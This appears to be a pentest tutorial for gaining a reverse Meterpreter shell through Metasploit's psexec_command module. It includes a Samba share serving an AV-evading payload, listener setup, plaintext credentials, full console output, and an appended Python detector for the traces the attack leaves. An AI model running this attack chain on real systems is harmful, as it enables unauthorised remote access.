Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:
- Metasploit psexec
- Metasploit psexec_psh
- Windows psexec executable
- Impacket psexec python script
- pth-winexe
- pth-wmis
- smbexec
- Veil-Catapult
All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec_command” module, created by Royce Davis (@r3dy__), from Accuvant LABS.
First, we need to create an AV-safe executable to deploy to our target. If you haven’t checked it out yet, Veil-Evasion is one of the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access.
Add this section to “/etc/samba/smb.conf”:
```ini
[payloads$]
    comment = Payloads
    path = /root/veil-output/compiled
    browseable = yes
    read only = yes
    guest ok = yes
    public = yes
```
In Kali Linux, Samba is not running by default, so we need to start it:
```
root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.
```
Next, we start up Metasploit and open a listener:
```
root@kali:~# msfconsole
[msfconsole banner art omitted]

       =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ]
+ -- --=[ 1355 exploits - 830 auxiliary - 237 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
msf exploit(handler) > [*] Starting the payload handler...
```
Now, we set up “psexec_command” and configure the module to run the executable payload directly from our SMB share:
```
msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start \\\\192.168.81.196\\payloads$\\TrustedSec39.exe
COMMAND => start \\192.168.81.196\payloads$\TrustedSec39.exe
msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202
RHOSTS => 192.168.81.202
msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe!
SMBPass => OMGDontPwnMe!
msf auxiliary(psexec_command) > set SMBUser TrustedSec
SMBUser => TrustedSec
```
Pull the trigger and cross your fingers:
```
msf auxiliary(psexec_command) > exploit
[*] 192.168.81.202:445 - Executing the command...
[*] Sending stage (769536 bytes) to 192.168.81.202
[*] 192.168.81.202:445 - Getting the command output...
[*] 192.168.81.202:445 - Command finished with no output
[*] 192.168.81.202:445 - Executing cleanup...
[-] 192.168.81.202:445 - Unable to cleanup \WINDOWS\Temp\FtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400
```
It does leave a randomly named txt file in the “Windows\Temp” directory that you need to clean up manually, but that’s it! You can also point RHOSTS to a text file of multiple remote hosts to target.
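The traces this run leaves behind are also what a defender can key on: psexec-style tools run the command through a service on the target, the command here launches an executable from a UNC share on another host, and the module's output lands in a random all-letter .txt under Windows\Temp (the file the cleanup step failed to delete above). The following Python is an added example written for this article, not code from the original post or from Metasploit; it scans constructed service-install records in an assumed simplified `service_name|image_path` form, and the allowed-host set is an assumption.

```python
import re

# Constructed sample service-install records in an assumed simplified
# "service_name|image_path" form (e.g. exported from System log event 7045).
# These are made up for this example; only the UNC path and temp-file name
# echo what the post's own module output shows.
SAMPLE_EVENTS = [
    r"Spooler|C:\Windows\System32\spoolsv.exe",
    r"aBcDeFgHiJkLmNoP|%COMSPEC% /C start \\192.168.81.196\payloads$\TrustedSec39.exe"
    r" > \WINDOWS\Temp\FtHThcznCVkttXJy.txt 2>&1",
    r"BackupAgent|\\fileserver01\software$\agent\install.exe",
    r"svc42|cmd.exe /c whoami > C:\Windows\Temp\out.log",
]

# Assumption: hosts from which service binaries may legitimately be launched.
ALLOWED_SHARE_HOSTS = {"fileserver01"}

# An executable referenced by UNC path: \\host\share\...\file.exe
UNC_EXE = re.compile(r"\\\\([\w.\-]+)\\\S+?\.(?:exe|bat|cmd|ps1)\b", re.IGNORECASE)
# Output redirected into a random all-letter .txt under Windows\Temp
# (the post's leftover file name is 16 letters; a range is allowed here).
TEMP_OUT = re.compile(r">\s*\\?WINDOWS\\Temp\\([A-Za-z]{8,32})\.txt", re.IGNORECASE)
# Command wrapped in cmd.exe /C (or %COMSPEC% /C)
SHELL_WRAPPER = re.compile(r"(?:%COMSPEC%|cmd(?:\.exe)?)\s+/c\b", re.IGNORECASE)


def analyze(record, allowed_hosts=ALLOWED_SHARE_HOSTS):
    """Return (service_name, [reasons]) for one record; empty reasons = benign."""
    name, _, image = record.partition("|")
    reasons = []
    unc = UNC_EXE.search(image)
    if unc and unc.group(1).lower() not in allowed_hosts:
        reasons.append(f"executable launched from unapproved UNC host {unc.group(1)}")
    if SHELL_WRAPPER.search(image) and TEMP_OUT.search(image):
        reasons.append("cmd /C wrapper redirecting output to a random Windows\\Temp .txt")
    return name, reasons


def find_suspicious(records, allowed_hosts=ALLOWED_SHARE_HOSTS):
    """Return only the records that produced at least one reason."""
    hits = []
    for record in records:
        name, reasons = analyze(record, allowed_hosts)
        if reasons:
            hits.append((name, reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```

Only the record that combines an unapproved UNC executable with the Windows\Temp redirect is reported; the software-deployment share and the plain local command are left alone.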
MOAR SHELLZ!